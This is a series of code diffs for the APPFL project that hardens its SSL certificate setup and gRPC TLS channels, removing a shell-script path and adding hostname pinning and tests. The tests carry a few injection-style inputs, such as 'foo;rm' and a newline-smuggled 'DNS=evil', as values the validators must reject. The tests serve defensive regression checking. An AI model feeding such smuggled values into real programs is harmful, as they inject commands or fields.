+                digital_signature=True,
+                content_commitment=False,
+                key_encipherment=True,
+                data_encipherment=False,
+                key_agreement=False,
+                key_cert_sign=False,
+                crl_sign=False,
+                encipher_only=False,
+                decipher_only=False,
+            ),
+            critical=True,
+        )
+        .add_extension(
+            x509.ExtendedKeyUsage(
+                [
+                    x509.oid.ExtendedKeyUsageOID.SERVER_AUTH,
+                ]
+            ),
+            critical=False,
+        )
+        .add_extension(san, critical=False)
+        .add_extension(
+            x509.SubjectKeyIdentifier.from_public_key(key.public_key()),
+            critical=False,
+        )
+        .add_extension(
+            x509.AuthorityKeyIdentifier.from_issuer_public_key(ca_cert.public_key()),
+            critical=False,
+        )
+        .sign(private_key=ca_key, algorithm=hashes.SHA256())
+    )
+    return key, cert
+
+
+def _write_private_key(
+    path: str, key: rsa.RSAPrivateKey, passphrase: Optional[bytes]
+) -> None:
+    if passphrase:
+        encryption: serialization.KeySerializationEncryption = (
+            serialization.BestAvailableEncryption(passphrase)
+        )
+    else:
+        encryption = serialization.NoEncryption()
+    pem = key.private_bytes(
+        encoding=serialization.Encoding.PEM,
+        format=serialization.PrivateFormat.PKCS8,
+        encryption_algorithm=encryption,
+    )
+    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW, 0o600)
+    try:
+        with os.fdopen(fd, "wb") as f:
+            f.write(pem)
+    except Exception:
+        os.close(fd)
+        raise
+    os.chmod(path, 0o600)
+
+
+def _write_certificate(path: str, cert: x509.Certificate) -> None:
+    pem = cert.public_bytes(serialization.Encoding.PEM)
+    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW, 0o644)
+    try:
+        with os.fdopen(fd, "wb") as f:
+            f.write(pem)
+    except Exception:
+        os.close(fd)
+        raise
+    os.chmod(path, 0o644)
+
+
+def setup_ssl():
+    """Console entry point for ``appfl-setup-ssl``.
+
+    Prompts the operator for a target directory and X.509 subject fields,
+    generates a self-signed CA and a CA-signed server certificate, and writes
+    them under the target directory. The CA private key is encrypted with a
+    passphrase by default — set ``APPFL_CA_PASSPHRASE`` to script the prompt,
+    or ``APPFL_CA_NO_ENCRYPT=1`` (plus an interactive confirmation, when on a
+    TTY) to opt out.
+    """
+    ssl_dir = _prompt_ssl_dir()
+
     default_C = "US"
     default_ST = "Illinois"
     default_O = "APPFL"
     default_DNS = "localhost"
     default_IP = "127.0.0.1"
 
-    # Prompt user for C, ST, O, CN, DNS, IP, with default values
-    C = (
-        input(f"Enter Country Code, press Enter to use default '{default_C}': ")
-        or default_C
+    country = _prompt_validated(
+        f"Enter Country Code (2 letters), press Enter to use default '{default_C}': ",
+        default_C,
+        _validate_country,
     )
-    ST = (
-        input(f"Enter State, press Enter to use default '{default_ST}': ") or default_ST
+    state = _prompt_validated(
+        f"Enter State, press Enter to use default '{default_ST}': ",
+        default_ST,
+        lambda v: _validate_name("State (ST)", v),
     )
-    ORG = (
-        input(f"Enter Organization (O), press Enter to use default '{default_O}': ")
-        or default_O
+    org = _prompt_validated(
+        f"Enter Organization (O), press Enter to use default '{default_O}': ",
+        default_O,
+        lambda v: _validate_name("Organization (O)", v),
     )
-    DNS = (
-        input(f"Enter DNS (DNS.1), press Enter to use default '{default_DNS}': ")
-        or default_DNS
+    dns_names = _prompt_san_dns(default_DNS)
+    ip_addresses = _prompt_san_ip(default_IP)
+
+    # The CN is informational under modern X.509 verifiers (which look at the
+    # SAN). Use the first DNS name so the cert still chains nicely on legacy
+    # tooling that consults the subject CN.
+    common_name = dns_names[0]
+
+    passphrase = _acquire_ca_passphrase()
+
+    ca_subject = _build_name(country, state, org, f"{org} Root CA")
+    ca_key, ca_cert = _generate_ca(ca_subject)
+
+    server_subject = _build_name(country, state, org, common_name)
+    server_san = _build_san(dns_names, ip_addresses)
+    server_key, server_cert = _generate_server_cert(
+        ca_key=ca_key,
+        ca_cert=ca_cert,
+        subject=server_subject,
+        san=server_san,
     )
-    IP = input(f"Enter IP, press Enter to use default '{default_IP}': ") or default_IP
 
-    # Create the configuration file content
-    conf_content = f"""
-[req]
-default_bits = 4096
-prompt = no
-default_md = sha256
-req_extensions = req_ext
-distinguished_name = dn
+    ca_key_path = os.path.join(ssl_dir, "ca.key")
+    ca_crt_path = os.path.join(ssl_dir, "ca.crt")
+    server_key_path = os.path.join(ssl_dir, "server.key")
+    server_crt_path = os.path.join(ssl_dir, "server.crt")
 
-[dn]
-C = {C}
-ST = {ST}
-O = {ORG}
-CN = {DNS}
+    _write_private_key(ca_key_path, ca_key, passphrase)
+    _write_certificate(ca_crt_path, ca_cert)
+    _write_private_key(server_key_path, server_key, passphrase=None)
+    _write_certificate(server_crt_path, server_cert)
 
-[req_ext]
-subjectAltName = @alt_names
-
-[alt_names]
-DNS.1 = {DNS}
-IP.1 = {IP}
-    """
-
-    # Write the configuration file
-    conf_file = os.path.join(ssl_dir, "certificate.conf")
-    with open(conf_file, "w") as f:
-        f.write(conf_content)
-
-    # Certificate generation script
-    script_content = f"""#!/bin/bash
-set -e
-cd "$( cd "$( dirname "{{{{BASH_SOURCE[0]}}}}" )" >/dev/null 2>&1 && pwd )"
-
-CA_PASSWORD=notsafe
-
-CERT_DIR={ssl_dir}
-
-# Generate the root certificate authority key and certificate based on key
-openssl genrsa -out $CERT_DIR/ca.key 4096
-openssl req \\
-    -new \\
-    -x509 \\
-    -key $CERT_DIR/ca.key \\
-    -sha256 \\
-    -subj "/C={C}/ST={ST}/O={ORG}" \\
-    -days 365 -out $CERT_DIR/ca.crt
-
-# Generate a new private key for the server
-openssl genrsa -out $CERT_DIR/server.key 4096
-
-# Create a signing CSR
-openssl req \\
-    -new \\
-    -key $CERT_DIR/server.key \\
-    -out $CERT_DIR/server.csr \\
-    -config {conf_file}
-
-# Generate a certificate for the server
-openssl x509 \\
-    -req \\
-    -in $CERT_DIR/server.csr \\
-    -CA $CERT_DIR/ca.crt \\
-    -CAkey $CERT_DIR/ca.key \\
-    -CAcreateserial \\
-    -out $CERT_DIR/server.crt \\
-    -days 365 \\
-    -sha256 \\
-    -extfile {conf_file} \\
-    -extensions req_ext
-    """
-
-    script_file = os.path.join(ssl_dir, "generate_ssl.sh")
-    with open(script_file, "w") as f:
-        f.write(script_content)
-
-    os.chmod(script_file, 0o700)
-    try:
-        subprocess.run([script_file], check=True)
-        print_str = f"Please copy the CA certificate {os.path.join(ssl_dir, 'ca.crt')} to the client machines"
-        print("=" * len(print_str))
-        print(f"SSL certificate stored in {os.path.join(ssl_dir, 'server.crt')}")
-        print(f"SSL private key stored in {os.path.join(ssl_dir, 'server.key')}")
-        print(f"CA certificate stored in  {os.path.join(ssl_dir, 'ca.crt')}")
-        print(print_str)
-        print("=" * len(print_str))
-    except subprocess.CalledProcessError as e:
-        print(f"An error occurred: {e}")
+    rule = "=" * 78
+    print(rule)
+    print(f"CA certificate stored in  {ca_crt_path}")
+    print(
+        f"CA private key stored in  {ca_key_path}"
+        + (" (encrypted)" if passphrase else " (UNENCRYPTED)")
+    )
+    print(f"Server certificate stored in {server_crt_path}")
+    print(f"Server private key stored in {server_key_path}")
+    print(rule)
+    print(f"Copy {ca_crt_path} to every client that should trust this federation.")
+    print(
+        "On each client, set in the gRPC client communicator config:\n"
+        f"  root_certificate: {ca_crt_path}\n"
+        "  use_ssl: true"
+    )
+    print(
+        "Pin the server identity (must match a SAN below) using:\n"
+        f"  server_hostname: {dns_names[0]}"
+    )
+    print(
+        "Subject alternative names on this server cert:\n"
+        f"  DNS: {', '.join(dns_names)}\n"
+        f"  IP:  {', '.join(ip_addresses)}"
+    )
+    print(rule)

--- a/src/appfl/comm/grpc/setup_ssl.py
+++ b/src/appfl/comm/grpc/setup_ssl.py
@@ -29,7 +29,6 @@ import pathlib
 import re
 import stat
 import sys
-from typing import List, Optional, Tuple
 
 from cryptography import x509
 from cryptography.hazmat.primitives import hashes, serialization
@@ -159,12 +158,12 @@ def _prompt_validated(prompt: str, default: str, validator) -> str:
             print(f"  {e}. Please try again.")
 
 
-def _split_csv(raw: str) -> List[str]:
+def _split_csv(raw: str) -> list[str]:
     """Split a comma-separated input into trimmed non-empty parts."""
     return [part.strip() for part in raw.split(",") if part.strip()]
 
 
-def _prompt_san_dns(default: str) -> List[str]:
+def _prompt_san_dns(default: str) -> list[str]:
     while True:
         raw = (
             input(
@@ -182,7 +181,7 @@ def _prompt_san_dns(default: str) -> List[str]:
             print(f"  {e}. Please try again.")
 
 
-def _prompt_san_ip(default: str) -> List[str]:
+def _prompt_san_ip(default: str) -> list[str]:
     while True:
         raw = (
             input(
@@ -200,7 +199,7 @@ def _prompt_san_ip(default: str) -> List[str]:
             print(f"  {e}. Please try again.")
 
 
-def _acquire_ca_passphrase() -> Optional[bytes]:
+def _acquire_ca_passphrase() -> bytes | None:
     """Return the CA private-key passphrase as bytes, or ``None`` if the
     operator explicitly opted out of encryption.
 
@@ -298,9 +297,9 @@ def _build_name(country: str, state: str, org: str, common_name: str) -> x509.Na
 
 
 def _build_san(
-    dns_names: List[str], ip_addresses: List[str]
+    dns_names: list[str], ip_addresses: list[str]
 ) -> x509.SubjectAlternativeName:
-    entries: List[x509.GeneralName] = [x509.DNSName(d) for d in dns_names]
+    entries: list[x509.GeneralName] = [x509.DNSName(d) for d in dns_names]
     entries.extend(x509.IPAddress(ipaddress.ip_address(ip)) for ip in ip_addresses)
     return x509.SubjectAlternativeName(entries)
 
@@ -313,7 +312,7 @@ def _utcnow() -> datetime.datetime:
 
 def _generate_ca(
     name: x509.Name, key_size: int = 4096
-) -> Tuple[rsa.RSAPrivateKey, x509.Certificate]:
+) -> tuple[rsa.RSAPrivateKey, x509.Certificate]:
     key = rsa.generate_private_key(public_exponent=65537, key_size=key_size)
     now = _utcnow()
     cert = (
@@ -355,7 +354,7 @@ def _generate_server_cert(
     subject: x509.Name,
     san: x509.SubjectAlternativeName,
     key_size: int = 4096,
-) -> Tuple[rsa.RSAPrivateKey, x509.Certificate]:
+) -> tuple[rsa.RSAPrivateKey, x509.Certificate]:
     key = rsa.generate_private_key(public_exponent=65537, key_size=key_size)
     now = _utcnow()
     cert = (
@@ -404,7 +403,7 @@ def _generate_server_cert(
 
 
 def _write_private_key(
-    path: str, key: rsa.RSAPrivateKey, passphrase: Optional[bytes]
+    path: str, key: rsa.RSAPrivateKey, passphrase: bytes | None
 ) -> None:
     if passphrase:
         encryption: serialization.KeySerializationEncryption = (

--- a/src/appfl/comm/grpc_legacy/channel.py
+++ b/src/appfl/comm/grpc_legacy/channel.py
@@ -2,10 +2,20 @@
 Auxiliary function to create a secure/insecure gRPC channel.
 """
 
-import grpc
+import logging
+import warnings
 from typing import Optional
+
+import grpc
 from appfl.comm.grpc.auth import APPFLAuthMetadataProvider
+from appfl.comm.grpc.channel import (
+    _is_ip_literal,
+    _uri_host,
+    _validate_server_hostname,
+)
 from appfl.login_manager import BaseAuthenticator
+
+_logger = logging.getLogger(__name__)
 
 
 def create_grpc_channel(
@@ -16,6 +26,9 @@ def create_grpc_channel(
     root_certificates: Optional[bytes] = None,
     authenticator: Optional[BaseAuthenticator] = None,
     max_message_size: int = 2 * 1024 * 1024,
+    server_hostname: Optional[str] = None,
+    insecure_skip_server_identity_check: bool = False,
+    allow_uri_hostname_mismatch: bool = False,
 ) -> grpc.Channel:
     """
     Create a secure/insecure gRPC channel with the given parameters.
@@ -26,6 +39,9 @@ def create_grpc_channel(
     :param root_certificates: The PEM-encoded root certificates as a byte string, or `None` to retrieve them from a default location chosen by gRPC runtime.
     :param authenticator: The authenticator to use for authenticating the client in each RPC.
     :param max_message_size: The maximum message size in bytes.
+    :param server_hostname: Pinned server identity. See :func:`appfl.comm.grpc.create_grpc_channel`.
+    :param insecure_skip_server_identity_check: Opt-out of SAN verification. Loud warning.
+    :param allow_uri_hostname_mismatch: Permit URI host vs ``server_hostname`` mismatch.
     :return: The created gRPC channel.
     """
     assert not (use_authenticator and not use_ssl), (
@@ -36,6 +52,37 @@ def create_grpc_channel(
         ("grpc.max_receive_message_length", max_message_size),
     ]
     if use_ssl:
+        if not server_hostname and not insecure_skip_server_identity_check:
+            raise ValueError(
+                "create_grpc_channel: server_hostname is required when "
+                "use_ssl=True. Pin the value that appears as a "
+                "SubjectAlternativeName on the server certificate. To "
+                "intentionally skip the identity check, set "
+                "insecure_skip_server_identity_check=True."
+            )
+        if server_hostname:
+            _validate_server_hostname(server_hostname)
+            uri_host = _uri_host(server_uri)
+            if (
+                uri_host
+                and not _is_ip_literal(uri_host)
+                and uri_host != server_hostname
+                and not allow_uri_hostname_mismatch
+            ):
+                raise ValueError(
+                    f"create_grpc_channel: server_uri host {uri_host!r} does "
+                    f"not match server_hostname {server_hostname!r}. Set "
+                    "allow_uri_hostname_mismatch=True if intentional."
+                )
+            channel_options.append(("grpc.ssl_target_name_override", server_hostname))
+        else:
+            msg = (
+                "create_grpc_channel: insecure_skip_server_identity_check=True; "
+                "server certificate SAN will NOT be verified. Do not use in "
+                "production."
+            )
+            warnings.warn(msg, stacklevel=2)
+            _logger.warning(msg)
         if root_certificates is not None:
             credentials = grpc.ssl_channel_credentials(
                 root_certificates=root_certificates

--- a/tests/test_grpc_tls.py
+++ b/tests/test_grpc_tls.py
@@ -5,7 +5,7 @@ from __future__ import annotations
 
 import datetime
 import ipaddress
-from typing import List, Optional, Tuple
+from typing import Tuple
 
 import pytest
 
@@ -189,9 +189,9 @@ def test_insecure_channel_path_unchanged(fake_grpc):
 
 def _mint_cert(
     *,
-    issuer: Optional["Tuple"] = None,
-    dns_names: List[str] = None,
-    ip_addresses: List[str] = None,
+    issuer: Tuple | None = None,
+    dns_names: list[str] = None,
+    ip_addresses: list[str] = None,
     is_ca: bool = False,
     common_name: str = "test",
 ):
@@ -234,7 +234,7 @@ def _mint_cert(
             x509.BasicConstraints(ca=True, path_length=0), critical=True
         )
 
-    sans: List[x509.GeneralName] = []
+    sans: list[x509.GeneralName] = []
     for d in dns_names or []:
         sans.append(x509.DNSName(d))
     for ip in ip_addresses or []:

--- a/tests/test_grpc_tls.py
+++ b/tests/test_grpc_tls.py
@@ -1,0 +1,349 @@
+"""Tests for src/appfl/comm/grpc/channel.py covering security-review #9
+(server identity enforcement via SNI / SubjectAlternativeName)."""
+
+from __future__ import annotations
+
+import datetime
+import ipaddress
+from typing import List, Optional, Tuple
+
+import pytest
+
+import appfl.comm.grpc.channel as channel_module
+from appfl.comm.grpc.channel import (
+    _validate_server_hostname,
+    create_grpc_channel,
+)
+
+
+# ---------------------------------------------------------------------------
+# Hostname validator (pure unit tests, no networking, no fixtures needed).
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "good",
+    [
+        "localhost",
+        "appfl.example.com",
+        "a.b.c.d.example",
+        "127.0.0.1",
+        "::1",
+        "10.0.0.5",
+    ],
+)
+def test_validate_server_hostname_accepts(good):
+    _validate_server_hostname(good)  # does not raise
+
+
+@pytest.mark.parametrize(
+    "bad",
+    [
+        "",
+        "*.example.com",
+        "-foo.example",
+        "foo_bar.example",
+        ".foo",
+        "foo..bar",
+        "foo bar",
+        "foo;rm",
+        "foo\nDNS=evil",
+        "a" * 254,
+    ],
+)
+def test_validate_server_hostname_rejects(bad):
+    with pytest.raises(ValueError):
+        _validate_server_hostname(bad)
+
+
+# ---------------------------------------------------------------------------
+# create_grpc_channel — argument-validation tests using a stub grpc.
+# ---------------------------------------------------------------------------
+
+
+class _DummyChannel:
+    def close(self):
+        pass
+
+
+@pytest.fixture
+def fake_grpc(monkeypatch):
+    """Replace grpc.secure_channel/grpc.insecure_channel with recorders so the
+    tests never open a socket."""
+    calls = {"secure": [], "insecure": []}
+
+    def _secure_channel(target, credentials, options=None):
+        calls["secure"].append((target, options))
+        return _DummyChannel()
+
+    def _insecure_channel(target, options=None):
+        calls["insecure"].append((target, options))
+        return _DummyChannel()
+
+    def _ssl_channel_credentials(root_certificates=None):
+        return ("ssl-creds", root_certificates)
+
+    monkeypatch.setattr(channel_module.grpc, "secure_channel", _secure_channel)
+    monkeypatch.setattr(channel_module.grpc, "insecure_channel", _insecure_channel)
+    monkeypatch.setattr(
+        channel_module.grpc,
+        "ssl_channel_credentials",
+        _ssl_channel_credentials,
+    )
+    return calls
+
+
+def test_missing_server_hostname_under_tls_raises(fake_grpc):
+    with pytest.raises(ValueError, match="server_hostname is required"):
+        create_grpc_channel(
+            "localhost:50051",
+            use_ssl=True,
+            root_certificate=None,
+        )
+    # No socket ever opened.
+    assert fake_grpc["secure"] == []
+    assert fake_grpc["insecure"] == []
+
+
+def test_tls_pins_server_hostname_via_override(fake_grpc):
+    create_grpc_channel(
+        "localhost:50051",
+        use_ssl=True,
+        server_hostname="localhost",
+    )
+    assert len(fake_grpc["secure"]) == 1
+    _, options = fake_grpc["secure"][0]
+    assert ("grpc.ssl_target_name_override", "localhost") in options
+
+
+def test_ip_literal_uri_with_dns_hostname_is_allowed(fake_grpc):
+    """A common HPC case: connect to 127.0.0.1, pin SAN=localhost."""
+    create_grpc_channel(
+        "127.0.0.1:50051",
+        use_ssl=True,
+        server_hostname="localhost",
+    )
+    assert len(fake_grpc["secure"]) == 1
+
+
+def test_uri_hostname_mismatch_rejected(fake_grpc):
+    with pytest.raises(ValueError, match="does not match"):
+        create_grpc_channel(
+            "internal-lb.corp:443",
+            use_ssl=True,
+            server_hostname="appfl.example.com",
+        )
+
+
+def test_uri_hostname_mismatch_allowed_with_opt_in(fake_grpc):
+    create_grpc_channel(
+        "internal-lb.corp:443",
+        use_ssl=True,
+        server_hostname="appfl.example.com",
+        allow_uri_hostname_mismatch=True,
+    )
+    assert len(fake_grpc["secure"]) == 1
+
+
+def test_bypass_flag_skips_identity_and_warns(fake_grpc):
+    with pytest.warns(UserWarning, match="will NOT be verified"):
+        create_grpc_channel(
+            "any-host:50051",
+            use_ssl=True,
+            insecure_skip_server_identity_check=True,
+        )
+    assert len(fake_grpc["secure"]) == 1
+    _, options = fake_grpc["secure"][0]
+    # No SAN pin must be present when skip is on.
+    keys = [k for k, _ in options]
+    assert "grpc.ssl_target_name_override" not in keys
+
+
+def test_invalid_server_hostname_rejected(fake_grpc):
+    with pytest.raises(ValueError, match="wildcard"):
+        create_grpc_channel(
+            "localhost:50051",
+            use_ssl=True,
+            server_hostname="*.example.com",
+        )
+    with pytest.raises(ValueError, match="not a valid"):
+        create_grpc_channel(
+            "localhost:50051",
+            use_ssl=True,
+            server_hostname="bad_underscore.example",
+        )
+
+
+def test_insecure_channel_path_unchanged(fake_grpc):
+    """server_hostname is irrelevant for insecure channels (no TLS to pin)."""
+    create_grpc_channel("localhost:50051", use_ssl=False)
+    assert len(fake_grpc["insecure"]) == 1
+    assert fake_grpc["secure"] == []
+
+
+# ---------------------------------------------------------------------------
+# Live TLS handshake against a tiny gRPC server, using setup_ssl's generator
+# to make end-to-end certs.
+# ---------------------------------------------------------------------------
+
+
+def _mint_cert(
+    *,
+    issuer: Optional["Tuple"] = None,
+    dns_names: List[str] = None,
+    ip_addresses: List[str] = None,
+    is_ca: bool = False,
+    common_name: str = "test",
+):
+    """Mint a self-signed CA or a CA-signed leaf cert with the requested SAN.
+
+    Returns ``(private_key, certificate)``.
+    """
+    from cryptography import x509
+    from cryptography.hazmat.primitives import hashes
+    from cryptography.hazmat.primitives.asymmetric import rsa
+    from cryptography.x509.oid import NameOID
+
+    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
+    subject = x509.Name(
+        [
+            x509.NameAttribute(NameOID.COMMON_NAME, common_name),
+        ]
+    )
+    now = datetime.datetime.now(datetime.timezone.utc)
+    if issuer is None:
+        # self-signed
+        issuer_name = subject
+        signing_key = key
+    else:
+        issuer_key, issuer_cert = issuer
+        issuer_name = issuer_cert.subject
+        signing_key = issuer_key
+
+    builder = (
+        x509.CertificateBuilder()
+        .subject_name(subject)
+        .issuer_name(issuer_name)
+        .public_key(key.public_key())
+        .serial_number(x509.random_serial_number())
+        .not_valid_before(now - datetime.timedelta(minutes=1))
+        .not_valid_after(now + datetime.timedelta(days=1))
+    )
+    if is_ca:
+        builder = builder.add_extension(
+            x509.BasicConstraints(ca=True, path_length=0), critical=True
+        )
+
+    sans: List[x509.GeneralName] = []
+    for d in dns_names or []:
+        sans.append(x509.DNSName(d))
+    for ip in ip_addresses or []:
+        sans.append(x509.IPAddress(ipaddress.ip_address(ip)))
+    if sans:
+        builder = builder.add_extension(
+            x509.SubjectAlternativeName(sans), critical=False
+        )
+
+    cert = builder.sign(private_key=signing_key, algorithm=hashes.SHA256())
+    return key, cert
+
+
+def _pem(key_or_cert, *, is_key: bool) -> bytes:
+    from cryptography.hazmat.primitives import serialization
+
+    if is_key:
+        return key_or_cert.private_bytes(
+            encoding=serialization.Encoding.PEM,
+            format=serialization.PrivateFormat.PKCS8,
+            encryption_algorithm=serialization.NoEncryption(),
+        )
+    return key_or_cert.public_bytes(serialization.Encoding.PEM)
+
+
+@pytest.fixture
+def tls_fixture(tmp_path):
+    """Generate a CA + matching server cert (SAN: localhost, 127.0.0.1) on
+    disk, plus a server cert with the wrong SAN for negative tests."""
+    ca_key, ca_cert = _mint_cert(is_ca=True, common_name="Test CA")
+    good_key, good_cert = _mint_cert(
+        issuer=(ca_key, ca_cert),
+        dns_names=["localhost"],
+        ip_addresses=["127.0.0.1"],
+        common_name="localhost",
+    )
+    bad_key, bad_cert = _mint_cert(
+        issuer=(ca_key, ca_cert),
+        dns_names=["other.example.com"],
+        common_name="other.example.com",
+    )
+
+    return {
+        "ca_pem": _pem(ca_cert, is_key=False),
+        "good_key_pem": _pem(good_key, is_key=True),
+        "good_cert_pem": _pem(good_cert, is_key=False),
+        "bad_key_pem": _pem(bad_key, is_key=True),
+        "bad_cert_pem": _pem(bad_cert, is_key=False),
+    }
+
+
+def _start_server(server_key_pem: bytes, server_cert_pem: bytes, ca_pem: bytes):
+    """Start a tiny gRPC server that just listens. The handshake is what's
+    under test; we never call an RPC method."""
+    import grpc
+    from concurrent import futures
+
+    server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))
+    creds = grpc.ssl_server_credentials(
+        ((server_key_pem, server_cert_pem),),
+        root_certificates=ca_pem,
+    )
+    port = server.add_secure_port("127.0.0.1:0", creds)
+    server.start()
+    return server, port
+
+
+def test_san_match_handshake_succeeds(tls_fixture, monkeypatch):
+    # Use real grpc (un-patch fake_grpc fixture — not requested here).
+    import grpc
+
+    server, port = _start_server(
+        tls_fixture["good_key_pem"],
+        tls_fixture["good_cert_pem"],
+        tls_fixture["ca_pem"],
+    )
+    try:
+        channel = create_grpc_channel(
+            f"127.0.0.1:{port}",
+            use_ssl=True,
+            root_certificate=tls_fixture["ca_pem"],
+            server_hostname="localhost",
+        )
+        # channel_ready returns when the handshake completes successfully.
+        grpc.channel_ready_future(channel).result(timeout=15)
+        channel.close()
+    finally:
+        server.stop(0)
+
+
+def test_san_mismatch_handshake_fails(tls_fixture):
+    """Server cert has SAN=other.example.com; client pins localhost. Handshake
+    must fail at TLS layer rather than letting any application data through."""
+    import grpc
+
+    server, port = _start_server(
+        tls_fixture["bad_key_pem"],
+        tls_fixture["bad_cert_pem"],
+        tls_fixture["ca_pem"],
+    )
+    try:
+        channel = create_grpc_channel(
+            f"127.0.0.1:{port}",
+            use_ssl=True,
+            root_certificate=tls_fixture["ca_pem"],
+            server_hostname="localhost",
+        )
+        with pytest.raises((grpc.FutureTimeoutError, grpc.RpcError)):
+            grpc.channel_ready_future(channel).result(timeout=5)
+        channel.close()
+    finally:
+        server.stop(0)

--- a/tests/test_setup_ssl.py
+++ b/tests/test_setup_ssl.py
@@ -1,21 +1,25 @@
-"""Tests for src/appfl/comm/grpc/setup_ssl.py covering the fixes for
-security-review finding #6 (shell injection via os.system on a user-supplied
-path)."""
+"""Tests for src/appfl/comm/grpc/setup_ssl.py.
+
+Covers the fixes for security-review findings #6 (shell-metachar guard on
+ssl_dir — regression test only; no shell is invoked any more), #10 (CA private
+key encrypted with a passphrase by default), and #16 (subject-field /
+SAN-field validation, structural removal of the shell template).
+"""
+
+from __future__ import annotations
 
 import os
 import stat
-import subprocess
+import sys
 
 import pytest
-
-import sys
 
 import appfl.comm.grpc.setup_ssl  # noqa: F401  (ensures submodule is loaded)
 from appfl.comm.grpc.setup_ssl import setup_ssl
 
-# The grpc package's __init__.py re-exports the `setup_ssl` function under
-# the same name as the submodule, shadowing it on the package object. Reach
-# the actual module via sys.modules so monkeypatching attributes works.
+# The grpc package's __init__.py re-exports `setup_ssl` (function) under the
+# same name as the submodule, shadowing it on the package object. Reach the
+# actual module via sys.modules so monkeypatching attributes works.
 setup_ssl_module = sys.modules["appfl.comm.grpc.setup_ssl"]
 
 
@@ -36,23 +40,35 @@ def _input_feeder(inputs):
 
 
 @pytest.fixture
-def stub_openssl(monkeypatch):
-    """Replace subprocess.run so the test never actually invokes openssl."""
-    calls = []
+def env_passphrase(monkeypatch):
+    """Run setup_ssl non-interactively with a fixed CA passphrase."""
+    monkeypatch.setenv("APPFL_CA_PASSPHRASE", "test-passphrase-12")
+    monkeypatch.delenv("APPFL_CA_NO_ENCRYPT", raising=False)
+    return b"test-passphrase-12"
 
-    def _run(argv, check=False, **kwargs):
-        calls.append(argv)
-        return subprocess.CompletedProcess(argv, 0)
 
-    monkeypatch.setattr(setup_ssl_module.subprocess, "run", _run)
-    return calls
+def _default_subject_inputs():
+    """Five empty strings: accept all subject-field defaults (C, ST, ORG, DNS, IP)."""
+    return ["", "", "", "", ""]
+
+
+def _run_setup(monkeypatch, ssl_dir, *, extra_inputs=()):
+    """Drive setup_ssl with one ssl_dir + the five default subject fields."""
+    inputs = [str(ssl_dir), *_default_subject_inputs(), *extra_inputs]
+    monkeypatch.setattr("builtins.input", _input_feeder(inputs))
+    setup_ssl()
+
+
+# ---------------------------------------------------------------------------
+# Regression tests for #6 (shell-metachar guard on ssl_dir).
+# The shell script and os.system call were removed by #16, but the path
+# whitelist must continue to reject every metachar class.
+# ---------------------------------------------------------------------------
 
 
 def test_rejects_shell_metachars_in_ssl_dir(
-    monkeypatch, tmp_path, stub_openssl, capsys
+    monkeypatch, tmp_path, env_passphrase, capsys
 ):
-    """A ssl_dir with shell metacharacters must be rejected and the prompt
-    must re-ask, eventually accepting a clean path."""
     pwned_marker = tmp_path / "pwned"
     good_dir = tmp_path / "ssl"
 
@@ -60,17 +76,7 @@ def test_rejects_shell_metachars_in_ssl_dir(
 
     monkeypatch.setattr(
         "builtins.input",
-        _input_feeder(
-            [
-                malicious,
-                str(good_dir),
-                "",  # C
-                "",  # ST
-                "",  # ORG
-                "",  # DNS
-                "",  # IP
-            ]
-        ),
+        _input_feeder([malicious, str(good_dir), *_default_subject_inputs()]),
     )
 
     setup_ssl()
@@ -79,10 +85,8 @@ def test_rejects_shell_metachars_in_ssl_dir(
         "Shell command substitution executed — the metachar guard is broken"
     )
     assert good_dir.is_dir()
-    assert (good_dir / "generate_ssl.sh").is_file()
-
-    captured = capsys.readouterr()
-    assert "Invalid directory" in captured.out
+    assert (good_dir / "ca.key").is_file()
+    assert "Invalid directory" in capsys.readouterr().out
 
 
 @pytest.mark.parametrize(
@@ -101,81 +105,329 @@ def test_rejects_shell_metachars_in_ssl_dir(
     ],
 )
 def test_metachar_classes_each_rejected(
-    monkeypatch, tmp_path, stub_openssl, capsys, bad
+    monkeypatch, tmp_path, env_passphrase, capsys, bad
 ):
-    """Each shell-metacharacter class must be rejected by the whitelist."""
     good_dir = tmp_path / "ssl"
-
     monkeypatch.setattr(
         "builtins.input",
-        _input_feeder([bad, str(good_dir), "", "", "", "", ""]),
+        _input_feeder([bad, str(good_dir), *_default_subject_inputs()]),
     )
     setup_ssl()
     assert good_dir.is_dir()
     assert "Invalid directory" in capsys.readouterr().out
 
 
-def test_chmod_uses_os_chmod_not_shell(monkeypatch, tmp_path, stub_openssl):
-    """The fix replaced os.system with os.chmod. Patch os.system to fail
-    loudly so any regression is caught."""
+def test_no_shell_invocation(monkeypatch, tmp_path, env_passphrase):
+    """The rewrite removed all shell calls. Patch every shell entry point to
+    fail loudly; the happy path must complete without touching any of them."""
 
-    def _boom(cmd):
+    def _boom_os_system(cmd):  # pragma: no cover - asserted to never run
         raise AssertionError(
-            f"setup_ssl invoked the shell via os.system({cmd!r}) — regression of issue #6"
+            f"setup_ssl invoked os.system({cmd!r}) — regression of #6/#16"
         )
 
-    monkeypatch.setattr(setup_ssl_module.os, "system", _boom)
+    monkeypatch.setattr(setup_ssl_module.os, "system", _boom_os_system)
 
-    good_dir = tmp_path / "ssl"
+    if hasattr(setup_ssl_module, "subprocess"):
+        # The module no longer imports subprocess; if it ever re-introduces
+        # one, this guard fires on it.
+        raise AssertionError(
+            "setup_ssl re-imported subprocess; the rewrite intentionally "
+            "removed the shell path."
+        )
+
+    _run_setup(monkeypatch, tmp_path / "ssl")
+
+
+# ---------------------------------------------------------------------------
+# #10 — CA private key is encrypted by default.
+# ---------------------------------------------------------------------------
+
+
+def _load_pem_key(path, password=None):
+    from cryptography.hazmat.primitives import serialization
+
+    with open(path, "rb") as f:
+        return serialization.load_pem_private_key(f.read(), password=password)
+
+
+def test_ca_key_requires_passphrase(monkeypatch, tmp_path, env_passphrase):
+    ssl_dir = tmp_path / "ssl"
+    _run_setup(monkeypatch, ssl_dir)
+    with pytest.raises(TypeError):
+        _load_pem_key(ssl_dir / "ca.key", password=None)
+    key = _load_pem_key(ssl_dir / "ca.key", password=env_passphrase)
+    assert key.key_size == 4096
+
+
+def test_ca_key_wrong_passphrase_rejected(monkeypatch, tmp_path, env_passphrase):
+    ssl_dir = tmp_path / "ssl"
+    _run_setup(monkeypatch, ssl_dir)
+    with pytest.raises(ValueError):
